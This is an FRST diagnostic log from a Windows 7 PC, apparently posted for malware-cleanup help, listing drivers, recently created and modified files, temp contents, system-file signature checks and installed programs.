C:\Windows\SysWOW64\PnkBstrA.exe [75136 2014-02-28] ()R2 tvnserver; C:\Program Files (x86)\TightVNC\tvnserver.exe [815704 2010-07-08] (GlavSoft LLC.)S2 dwmrcs; No ImagePathS2 HP Health Check Service; "C:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe" [X]S3 hpqwmiex; "C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe" [X] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R3 DwMirror; C:\Windows\System32\DRIVERS\DamewareMini.sys [5632 2008-03-14] (DameWare Development, LLC)R1 dwvkbd; C:\Windows\System32\DRIVERS\dwvkbd64.sys [30720 2008-03-13] (DameWare)R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-10] (Malwarebytes Corporation)R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)S3 NAL; C:\Windows\system32\Drivers\iqvw64e.sys [32224 2009-09-21] (Intel Corporation ) [File not signed]R3 PlantronicsGC; C:\Windows\System32\drivers\PLTGC.sys [1327104 2011-11-04] (C-Media Electronics Inc)S3 PTHDRBUS; C:\Windows\System32\DRIVERS\PTHDRBUS.sys [69264 2009-12-15] (DEVGURU Co., LTD.)S3 PTHDRMDM; C:\Windows\System32\DRIVERS\PTHDRMDM.sys [176912 2009-12-15] (DEVGURU Co., LTD.(www.devguru.co.kr))S3 PTHDRVSP; C:\Windows\System32\DRIVERS\PTHDRVSP.sys [176912 2009-12-15] (DEVGURU Co., LTD.(www.devguru.co.kr))S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [27520 2007-05-14] (Research In Motion Limited)U3 uxryipod; \??\C:\Users\Calahan\AppData\Local\Temp\uxryipod.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-11-10 22:57 - 2014-11-10 22:57 - 00017513 _____ () C:\Users\Calahan\Downloads\FRST.txt2014-11-10 22:43 - 2014-11-10 22:43 - 00000000 ____D () C:\Users\Calahan\Downloads\tdsskiller2014-11-10 22:42 - 2014-11-10 22:42 - 04163057 _____ () C:\Users\Calahan\Downloads\tdsskiller.zip2014-11-10 21:15 - 2014-11-10 21:16 - 00380416 _____ () C:\Users\Calahan\Downloads\nffvqpeh.exe2014-11-10 21:14 - 2014-11-10 22:57 - 00000000 ____D () C:\FRST2014-11-10 21:13 - 2014-11-10 21:13 - 02116096 _____ (Farbar) C:\Users\Calahan\Downloads\FRST64.exe2014-11-10 20:59 - 2014-11-10 20:59 - 00000129 _____ () C:\Users\Calahan\Downloads\malwarebytes.txt2014-11-10 20:30 - 2014-11-10 20:31 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Calahan\Downloads \mbam_premium.exe2014-11-10 20:17 - 2014-11-10 20:16 - 00042070 _____ () C:\Users\Calahan\Downloads\NOV-10-14.xml2014-11-10 20:16 - 2014-11-10 20:16 - 00000049 _____ () C:\Users\Calahan\Downloads\NOV-10-14.txt2014-11-10 19:43 - 2014-11-10 20:56 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers \MBAMSwissArmy.sys2014-11-10 19:43 - 2014-11-10 20:31 - 00001112 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-11-10 19:43 - 2014-11-10 20:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs \Malwarebytes Anti-Malware2014-11-10 19:43 - 2014-11-10 20:31 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware2014-11-10 19:43 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers \mbamchameleon.sys2014-11-10 19:43 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers \mwac.sys2014-11-10 19:43 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers \mbam.sys2014-11-10 19:41 - 2014-11-10 19:42 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Calahan\Downloads\mbam- setup-2.0.3.1025.exe2014-11-09 23:50 - 2014-11-09 23:50 - 00003056 _____ () C:\Windows\System32\Tasks\{44A1741A-3325-5E3D-3774- F73A5D212500}2014-11-05 16:54 - 2014-11-05 16:54 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\BMMCegjc2014-11-04 16:36 - 2014-11-04 16:36 - 00000000 ____D () C:\Users\Calahan\AppData\Local\FalloutNV2014-11-04 01:12 - 2014-11-04 01:12 - 00000000 ____D () C:\Users\Calahan\Documents\Activision2014-11-03 21:31 - 2014-11-03 21:31 - 00000209 _____ () C:\Users\Calahan\Downloads\1OVPH1R.mp42014-11-03 19:34 - 2014-11-10 19:38 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Coxoik2014-11-03 19:34 - 2014-11-03 19:36 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Kudo2014-11-03 18:39 - 2014-11-03 19:34 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage2014-10-31 20:26 - 2014-11-02 21:02 - 00000000 ____D () C:\Users\Calahan\Documents\Prototype2014-10-30 18:17 - 2014-10-30 18:17 - 00001419 _____ () C:\Users\Calahan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk2014-10-29 19:50 - 2014-09-19 19:09 - 17867776 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll2014-10-29 19:50 - 2014-09-19 18:55 - 02339328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll2014-10-29 19:50 - 2014-09-19 18:50 - 01385472 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll2014-10-29 19:50 - 2014-09-19 18:49 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll2014-10-29 19:50 - 2014-09-19 18:48 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl2014-10-29 19:50 - 2014-09-19 18:48 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll2014-10-29 19:50 - 2014-09-19 18:47 - 02157056 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll2014-10-29 19:50 - 2014-09-19 18:47 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll2014-10-29 19:50 - 2014-09-19 18:47 - 00599040 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll2014-10-29 19:50 - 2014-09-19 18:47 - 00173056 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe2014-10-29 19:50 - 2014-09-19 18:46 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb2014-10-29 19:50 - 2014-09-19 18:46 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll2014-10-29 19:50 - 2014-09-19 18:46 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll2014-10-29 19:50 - 2014-09-19 18:46 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll2014-10-29 19:50 - 2014-09-19 18:46 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll2014-10-29 19:50 - 2014-09-19 18:45 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll2014-10-29 19:50 - 2014-09-19 18:45 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe2014-10-29 19:50 - 2014-09-19 17:53 - 12364288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll2014-10-29 19:50 - 2014-09-19 17:44 - 01810432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll2014-10-29 19:50 - 2014-09-19 17:39 - 01138688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll2014-10-29 19:50 - 2014-09-19 17:38 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll2014-10-29 19:50 - 2014-09-19 17:37 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl2014-10-29 19:50 - 2014-09-19 17:36 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll2014-10-29 19:50 - 2014-09-19 17:36 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe2014-10-29 19:50 - 2014-09-19 17:36 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll2014-10-29 19:50 - 2014-09-19 17:35 - 00717824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll2014-10-29 19:50 - 2014-09-19 17:35 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll2014-10-29 19:50 - 2014-09-19 17:35 - 00421376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll2014-10-29 19:50 - 2014-09-19 17:35 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll2014-10-29 19:50 - 2014-09-19 17:34 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb2014-10-29 19:50 - 2014-09-19 17:34 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll2014-10-29 19:50 - 2014-09-19 17:34 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll2014-10-29 19:50 - 2014-09-19 17:34 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll2014-10-29 19:50 - 2014-09-19 17:34 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe2014-10-29 19:50 - 2014-09-19 17:33 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll2014-10-29 19:49 - 2014-09-19 18:54 - 10920960 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll2014-10-29 19:49 - 2014-09-19 18:48 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll2014-10-29 19:49 - 2014-09-19 18:47 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll2014-10-29 19:49 - 2014-09-19 18:46 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe2014-10-29 19:49 - 2014-09-19 17:41 - 09739776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll2014-10-29 19:49 - 2014-09-19 17:35 - 01802752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll2014-10-29 19:49 - 2014-09-19 17:34 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe2014-10-29 19:49 - 2013-08-27 04:01 - 01545728 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll2014-10-29 19:49 - 2013-08-27 04:01 - 01143296 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll2014-10-29 19:49 - 2013-08-27 03:21 - 01077760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll2014-10-17 00:53 - 2014-10-17 00:53 - 00000000 ____D () C:\Users\Calahan\Downloads\Lower shadow map mod V42014-10-17 00:50 - 2014-10-17 00:50 - 00013020 _____ () C:\Users\Calahan\Downloads\Lower shadow map mod V4.pdmod2014-10-16 23:07 - 2014-10-16 23:07 - 00000000 ____D () C:\Users\Calahan\AppData\Local\PAYDAY2014-10-16 02:39 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll2014-10-16 02:39 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll2014-10-16 02:39 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll2014-10-16 02:39 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys2014-10-16 02:39 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll2014-10-16 02:39 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll2014-10-16 02:39 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll2014-10-16 02:39 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll2014-10-16 02:39 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll2014-10-16 02:39 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll2014-10-16 02:38 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll2014-10-16 02:38 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll2014-10-16 02:38 - 2014-08-28 21:07 - 05780480 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll2014-10-16 02:38 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll2014-10-16 02:38 - 2014-08-28 21:07 - 00322560 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll2014-10-16 02:38 - 2014-08-28 21:07 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll2014-10-16 02:38 - 2014-08-28 21:06 - 01125888 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe2014-10-16 02:38 - 2014-08-28 20:44 - 04922368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll2014-10-16 02:38 - 2014-08-28 20:44 - 01050112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe2014-10-16 02:38 - 2014-08-28 20:44 - 00269312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll2014-10-16 02:38 - 2014-08-28 20:44 - 00037376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll2014-10-16 02:37 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll2014-10-16 02:37 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll2014-10-16 02:37 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll2014-10-16 02:37 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll2014-10-16 02:37 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll2014-10-16 02:37 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe2014-10-16 02:37 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll2014-10-16 02:37 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll2014-10-16 02:37 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll2014-10-16 02:37 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll2014-10-16 02:37 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll2014-10-16 02:37 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll2014-10-16 02:37 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll2014-10-16 02:37 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys2014-10-16 02:37 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers \tssecsrv.sys2014-10-15 18:51 - 2014-10-15 18:52 - 00863820 _____ () C:\Users\Calahan\Downloads\Nosferatu.7z2014-10-12 01:05 - 2014-10-12 01:05 - 00000000 ____D () C:\Users\Calahan\AppData\Local\IsolatedStorage ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-11-10 22:45 - 2013-09-17 13:02 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job2014-11-10 22:25 - 2013-09-18 10:42 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job2014-11-10 20:54 - 2011-05-31 15:30 - 00001945 _____ () C:\Windows\epplauncher.mif2014-11-10 20:27 - 2009-07-13 23:45 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327- 5P-1.C7483456-A289-439d-8115-601632D005A02014-11-10 20:27 - 2009-07-13 23:45 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327- 5P-0.C7483456-A289-439d-8115-601632D005A02014-11-10 20:25 - 2009-07-14 00:13 - 00786662 _____ () C:\Windows\system32\PerfStringBackup.INI2014-11-10 20:24 - 2011-05-26 18:45 - 01295483 _____ () C:\Windows\WindowsUpdate.log2014-11-10 20:21 - 2014-06-28 01:20 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Raptr2014-11-10 20:18 - 2013-09-18 10:42 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job2014-11-10 20:18 - 2011-05-26 19:15 - 00485104 _____ () C:\Windows\PFRO.log2014-11-10 20:18 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT2014-11-10 20:18 - 2009-07-13 23:51 - 00057091 _____ () C:\Windows\setupact.log2014-11-10 20:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\Resources2014-11-10 19:28 - 2013-12-30 18:00 - 00000000 ____D () C:\Program Files (x86)\Steam2014-11-10 19:11 - 2014-06-25 17:33 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Skype2014-11-10 18:53 - 2014-02-28 16:31 - 00000000 ____D () C:\Users\Calahan\AppData\Local\CrashDumps2014-11-04 16:36 - 2014-02-28 16:37 - 00000000 ____D () C:\Users\Calahan\Documents\My Games2014-11-04 16:36 - 2014-02-28 16:23 - 00545972 _____ () C:\Windows\DirectX.log2014-11-04 15:59 - 2009-07-14 00:32 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games2014-11-02 23:25 - 2014-06-30 17:19 - 00000000 ____D () C:\Program Files (x86)\Overwolf2014-10-30 21:35 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache2014-10-30 18:18 - 2014-06-30 17:18 - 00000000 ____D () C:\Users\Calahan\AppData\Local\Overwolf2014-10-30 06:25 - 2011-05-26 16:47 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\zh-HK2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\tr-TR2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\zh-HK2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\tr-TR2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions2014-10-29 11:26 - 2013-09-18 10:43 - 00002193 _____ () C:\Users\Public\Desktop\Google Chrome.lnk2014-10-21 12:20 - 2013-09-18 10:42 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA2014-10-21 12:20 - 2013-09-18 10:42 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore2014-10-20 22:58 - 2014-10-07 22:24 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Mount&Blade With Fire and Sword2014-10-20 15:02 - 2014-06-27 21:05 - 00000000 ____D () C:\Users\Calahan\Downloads\pdmod_tool_v1.15_fix12014-10-17 03:50 - 2009-07-13 23:45 - 00416704 _____ () C:\Windows\system32\FNTCACHE.DAT2014-10-17 03:50 - 2009-07-13 22:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs \Accessories2014-10-17 03:48 - 2014-05-15 02:26 - 00000000 ___SD () C:\Windows\system32\CompatTel2014-10-17 02:19 - 2011-05-26 17:08 - 00000000 ____D () C:\ProgramData\Microsoft Help2014-10-17 02:14 - 2013-09-17 12:32 - 00000000 ____D () C:\Windows\system32\MRT2014-10-17 02:00 - 2011-05-31 15:31 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe2014-10-15 18:06 - 2009-07-14 00:08 - 00032560 _____ () C:\Windows\Tasks\SCHEDLGU.TXT Some content of TEMP:====================C:\Users\administrator\AppData\Local\Temp\ApnStub.exeC:\Users\administrator\AppData\Local\Temp\HPHASUtil.exeC:\Users\administrator\AppData\Local\Temp\jre-6u35-windows-i586-iftw.exeC:\Users\administrator\AppData\Local\Temp\MSN874A.exeC:\Users\administrator\AppData\Local\Temp\uninstall.exeC:\Users\administrator\AppData\Local\Temp\UninstallHPTCA.exeC:\Users\Administrator.cvci20462\AppData\Local\Temp\jre-6u37-windows-i586-iftw.exeC:\Users\Calahan\AppData\Local\Temp\raptrpatch.exeC:\Users\Calahan\AppData\Local\Temp\raptr_stub.exeC:\Users\Calahan\AppData\Local\Temp\SkypeSetup.exeC:\Users\Calahan\AppData\Local\Temp\stuprt.exeC:\Users\Calahan\AppData\Local\Temp\xmlUpdater.exeC:\Users\Logan\AppData\Local\Temp\jre-7u60-windows-i586-iftw.exeC:\Users\Mike2\AppData\Local\Temp\appupdater-{835E6293-B3C4-B247-9C49-3213713F7FC7}.exeC:\Users\Mike2\AppData\Local\Temp\jre-7u40-windows-i586-iftw.exeC:\Users\Mike2\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exeC:\Users\Mike2\AppData\Local\Temp\MouseKeyboardCenterx64_1033.exe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signedC:\Windows\System32\wininit.exe => File is digitally signedC:\Windows\SysWOW64\wininit.exe => File is digitally signedC:\Windows\explorer.exe => File is digitally signedC:\Windows\SysWOW64\explorer.exe => File is digitally signedC:\Windows\System32\svchost.exe => File is digitally signedC:\Windows\SysWOW64\svchost.exe => File is digitally signedC:\Windows\System32\services.exe => File is digitally signedC:\Windows\System32\User32.dll => File is digitally signedC:\Windows\SysWOW64\User32.dll => File is digitally signedC:\Windows\System32\userinit.exe => File is digitally signedC:\Windows\SysWOW64\userinit.exe => File is digitally signedC:\Windows\System32\rpcss.dll => File is digitally signedC:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-10-26 09:18 ==================== End Of Log ============================ Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10-11-2014Ran by Calahan at 2014-11-10 22:58:19Running from C:\Users\Calahan\DownloadsBoot Mode: Normal========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 0RBITALIS (HKLM-x32\...\Steam App 278440) (Version: - Alan Zucconi)140 (HKLM-x32\...\Steam App 242820) (Version: - Carlsen Games)3079 -- Block Action RPG (HKLM-x32\...\Steam App 259620) (Version: - Phr00t's Software)3089 -- Futuristic Action RPG (HKLM-x32\...\Steam App 263360) (Version: - Phr00t's Software)6180 the moon (HKLM-x32\...\Steam App 299660) (Version: - Turtle Cream)64 Bit HP CIO Components Installer (Version: 7.2.5 - Hewlett-Packard) Hidden7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)7-Zip 9.22beta (HKLM-x32\...\7-Zip) (Version: - )8BitMMO (HKLM-x32\...\Steam App 250420) (Version: - Archive Entertainment)A Wizard's Lizard (HKLM-x32\...\Steam App 280040) (Version: - Lost Decade Games)Actify SpinFire 9.0 (HKLM-x32\...\Actify SpinFire 9.0) (Version: 11.0.1435.1507.3 - Actify, Inc.)Actify SpinFire 9.0 (x32 Version: 11.0.1435.1507.3 - Actify Inc) HiddenActivClient x64 (HKLM\...\{86E45973-5352-439F-A115-2E8EE4D40140}) (Version: 6.2 - ActivIdentity)Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)Adobe Reader XI (11.0.06) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.06 - Adobe Systems Incorporated)Alan Wake (HKLM-x32\...\Steam App 108710) (Version: - Remedy Entertainment)AMD Catalyst Install Manager (HKLM\...\{6119B3A6-3603-9695-0398-CDF2AF0A13F8}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)Another World (HKLM-x32\...\Steam App 233550) (Version: - Eric Chahi)Anzio Lite 12.6 (HKLM-x32\...\{1F938630-5205-4C8C-81EA-D9ECFC8CA507}) (Version: - )ATI Problem Report Wizard (Version: 3.0.750.0 - ATI Technologies) HiddenAwesomenauts (HKLM-x32\...\Steam App 204300) (Version: - Ronimo Games)Bastion (HKLM-x32\...\Steam App 107100) (Version: - Supergiant Games)Belarc Advisor 8.3 (HKLM-x32\...\Belarc Advisor) (Version: 8.3.2.0 - Belarc Inc.)Breach & Clear (HKLM-x32\...\Steam App 266130) (Version: - Mighty Rabbit Studios)calibre (HKLM-x32\...\{D0940326-79BF-4D05-98CA-ED208661D34B}) (Version: 1.19.0 - Kovid Goyal)CameraHelperMsi (x32 Version: 13.51.815.0 - Logitech) HiddenCaribbean! (HKLM-x32\...\Steam App 293010) (Version: - Snowbird Games)Castle Crashers (HKLM-x32\...\Steam App 204360) (Version: - The Behemoth)Dark Souls: Prepare to Die Edition (HKLM-x32\...\Steam App 211420) (Version: - FromSoftware)DARK SOULS™ II (HKLM-x32\...\Steam App 236430) (Version: - FromSoftware, Inc)Darwinia (HKLM-x32\...\Steam App 1500) (Version: - Introversion Software)DriverTuner 3.5.0.1 (HKLM-x32\...\{520C1D80-935C-42B9-9340-E883849D804F}_is1) (Version: 3.5.0.1 - LionSea Software co., ltd)erLT (x32 Version: 1.20.138.34 - Logitech, Inc.) HiddenFAHClient (HKLM-x32\...\FAHClient) (Version: 7.3.6 - Stanford University)Fallout: New Vegas (HKLM-x32\...\Steam App 22380) (Version: - Obsidian Entertainment)FileZilla Client 3.5.2 (HKLM-x32\...\FileZilla Client) (Version: 3.5.2 - FileZilla Project)Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) HiddenGunpoint (HKLM-x32\...\Steam App 206190) (Version: - Suspicious Developments)Hack 'n' Slash (HKLM-x32\...\Steam App 246070) (Version: - Double Fine Productions)Hammerwatch (HKLM-x32\...\Steam App 239070) (Version: - )Hero of Many (HKLM-x32\...\Steam App 297370) (Version: - Trickster Arts)Hotline Miami (HKLM-x32\...\Steam App 219150) (Version: - Dennaton Games)HydraVision (x32 Version: 4.2.116.0 - ATI Technologies Inc.) HiddenImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.7.0 - LIGHTNING UK!)Infested Planet (HKLM-x32\...\Steam App 204530) (Version: - Rocket Bear Games)Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.0.1006 - Intel Corporation)Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)Intel® Network Connections 14.6.10.0 (HKLM\...\PROSetDX) (Version: 14.6.10.0 - Intel)Java 7 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217045FF}) (Version: 7.0.600 - Oracle)Jazzpunk (HKLM-x32\...\Steam App 250260) (Version: - Necrophone Games)Kerbal Space Program (HKLM-x32\...\Steam App 220200) (Version: - Squad)Khet 2.0 (HKLM-x32\...\Steam App 312720) (Version: - BlueLine Games)Killing Floor (HKLM-x32\...\Steam App 1250) (Version: - Tripwire Interactive)Kinetic Void (HKLM-x32\...\Steam App 227160) (Version: - Badland Studio)Logitech Webcam Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.51 - Logitech Inc.)LYNE (HKLM-x32\...\Steam App 266010) (Version: - Thomas Bowker)Magicka (HKLM-x32\...\Steam App 42910) (Version: - Arrowhead Game Studios)Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)Max Payne 2: The Fall of Max Payne (HKLM-x32\...\Steam App 12150) (Version: - Remedy Entertainment)Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{42AA4CA8-DCD8-4308-BCAB-0B6D75856A9D}) (Version: 3.5.95.0 - Microsoft Corporation)Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) 